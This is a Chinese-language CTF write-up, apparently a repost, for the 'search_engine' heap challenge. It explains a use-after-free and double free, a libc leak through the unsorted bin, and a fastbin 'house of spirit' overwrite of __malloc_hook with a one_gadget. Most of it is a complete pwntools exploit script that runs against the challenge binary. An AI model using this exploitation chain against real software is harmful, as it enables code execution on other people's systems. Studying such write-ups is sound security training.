本文共 2945 字,大约阅读时间需要 9 分钟。
_add_sentence
单词的结构体,gdb中的显示
单词的结构体为
struct word{ char * word_content,int word_size,char * sentence_content,int sentence_size,}
edit函数
delete函数
uaf
,然后看free的条件是不是限制,没有限制的话会造成double free
.这里的限制是寻找word
,但是当包含word
的sentence
被删除时,仅仅是将sentence
的内容置为0,word
节点中的单词并没有删除,因此可以通过\x00
,再次释放或者显示sentence
,即double free
和unstored leak
先申请small chunk,释放进入unstored bin,再通过查找\x00
,显示sentence,泄露libc地址
通过double free 触发 house of sprit,改写malloc_hook,触发onegadget
申请掉多余的chunk,得到指向fake chunk地址的chunk,修改malloc_hook为ongadget
再次分配chunk,就会触发onegadget
from pwn import *# challenge informatp.context(arch='amd64',os='linux',log_level='debug')myelf = ELF("./search_engine")#libc = ELF("./libc_64.so.6")#p = process(myelf.path,env={"LD_PRELOAD" : libc.path})p = process(myelf.path)#p = remote('chall.pwnable.tw', 10203)# local libclocal_libc_64 = ELF("/lib/x86_64-linux-gnu/libc.so.6")local_libc_32 = ELF("/lib/i386-linux-gnu/libc.so.6")# functp.s for quick scripts = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) r = lambda numb=4096 :p.recv(numb)ru = lambda delims :p.recvuntil(delims)pa = lambda :p.interactive()# misc functp.suu32 = lambda data :u32(data.ljust(4, b'\0'))uu64 = lambda data :u64(data.ljust(8, b'\0'))leak = lambda name,addr :log.success('{} : {:#x}'.format(name, addr))def debug(): gdb.attach(p) pause() #passdef add_fake(size,cont): sla('3: Quit\n','2') sla('Enter the sentence size:\n',str(size)) sa('Enter the sentence:\n',cont.ljust(size,'x'))def add(size,cont): sla('3: Quit\n','2') sla('Enter the sentence size:\n',str(size)) sa('Enter the sentence:\n',cont.rjust(size,'x')) def delete(cont): sla('3: Quit\n','1') sla('Enter the word size:\n',str(len(cont))) sa('Enter the word:\n',cont) sla('Delete this sentence (y/n)?\n','y')def show(cont): sla('3: Quit\n','1') sla('Enter the word size:\n',str(len(cont))) sa('Enter the word:\n',cont)#leak libc add(0x88,' index0')debug()delete('index0')debug()show('\x00'*6)p.recvuntil(': ')libc_base = uu64(p.recv(6)) - 88 -0x3c4b20log.success('libc_base==>'+hex(libc_base))sla('Delete this sentence (y/n)?\n','n')one = libc_base + 0xf1247#alert double freeadd(0x60,' index1')add(0x60,' index2')add(0x60,' index3')#delete the sentence by the word delete('index1')delete('index2')delete('index3')show('\x00'*6)sla('Delete this sentence (y/n)?\n','n')sla('Delete this sentence (y/n)?\n','y')debug()#fake chunkfake = libc_base + local_libc_64.sym['__malloc_hook'] -0x23 add_fake(0x60,p64(fake))add(0x60,'pad')add(0x60,'pad')debug()add_fake(0x60,'a'*0x13+p64(one))gdb.attach(p)p.interactive()
转载地址:http://etugf.baihongyu.com/